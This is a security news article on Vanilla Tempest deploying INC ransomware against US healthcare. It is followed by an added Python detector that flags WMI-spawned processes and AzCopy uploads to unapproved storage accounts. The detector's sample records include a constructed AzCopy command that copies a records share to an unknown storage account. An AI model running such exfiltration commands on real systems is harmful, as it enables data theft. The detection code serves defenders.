Sep 19, 2024 | Ravie Lakshmanan | Healthcare / Malware
Microsoft has disclosed that a financially motivated threat actor has, for the first time, been observed using a ransomware variant known as INC in attacks on the healthcare industry in the United States.
The company’s threat intelligence team has been monitoring the activity under the moniker Vanilla Tempest (formerly DEV-0832).
“Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before utilizing tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool,” it stated in a sequence of posts shared on X.
In the next phase, the attackers move laterally over Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.
According to Microsoft, Vanilla Tempest has been in operation since at least July 2022, with previous attacks targeting various sectors including education, healthcare, IT, and manufacturing, using different ransomware families like BlackCat, Quantum Locker, Zeppelin, and Rhysida.
The threat actor is also tracked as Vice Society, a group known for using existing lockers rather than developing its own.
This development coincides with ransomware groups like BianLian and Rhysida increasingly using Azure Storage Explorer and AzCopy to move sensitive data from compromised networks to cloud storage in an effort to avoid detection.
“This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage,” modePUSH researcher Britton Manahan explained.
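As an added illustration from the defender's side (not code from the article, Microsoft, or modePUSH), the following Python flags the two behaviours described above in constructed Sysmon-style process-creation records: the WMI Provider Host (WmiPrvSE.exe) spawning an unexpected child, which is how a process launched through WMI appears on the target host, and AzCopy copying data to a storage account outside an allowlist. Field layout, sample paths, storage account names and the benign-child list are assumptions to be tuned per environment.

```python
"""Added detection example; records, paths and account names are constructed."""
import re

# Constructed process-creation records: (parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "WmiPrvSE.exe"),
    ("C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "C:\\Windows\\Temp\\update.exe", "update.exe --deploy"),
    ("C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "C:\\Windows\\System32\\WerFault.exe", "WerFault.exe -u -p 1234"),
    ("C:\\Windows\\explorer.exe", "C:\\Tools\\azcopy.exe",
     "azcopy.exe copy D:\\Finance https://corpbackup.blob.core.windows.net/backups --recursive"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Users\\Public\\azcopy.exe",
     "azcopy.exe copy C:\\Shares\\Records https://unknownacct01.blob.core.windows.net/x --recursive"),
]

# Storage accounts the organisation owns (assumption: maintained by the defenders).
ALLOWED_STORAGE_ACCOUNTS = {"corpbackup"}

# Children WmiPrvSE.exe is expected to spawn on this fleet (assumption; tune per environment).
BENIGN_WMI_CHILDREN = {"werfault.exe", "wmic.exe", "conhost.exe"}

# Azure Blob endpoint: the first label is the storage account name.
STORAGE_HOST_RE = re.compile(r"https://([a-z0-9]+)\.blob\.core\.windows\.net/", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_wmi_child(parent_image, image):
    """Rule 1: a process created via WMI (Win32_Process) shows up as a child of WmiPrvSE.exe."""
    if basename(parent_image) != "wmiprvse.exe":
        return None
    child = basename(image)
    return None if child in BENIGN_WMI_CHILDREN else f"wmi_child:{child}"


def check_azcopy_destination(image, command_line):
    """Rule 2: AzCopy pushing data to a storage account that is not on the allowlist."""
    if basename(image) != "azcopy.exe":
        return None
    for account in STORAGE_HOST_RE.findall(command_line):
        if account.lower() not in ALLOWED_STORAGE_ACCOUNTS:
            return f"azcopy_unknown_account:{account.lower()}"
    return None


def scan(events):
    """Run both rules over every record and return the alerts in order of occurrence."""
    return [hit for parent, image, cmdline in events
            for hit in (check_wmi_child(parent, image), check_azcopy_destination(image, cmdline))
            if hit]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT", alert)
```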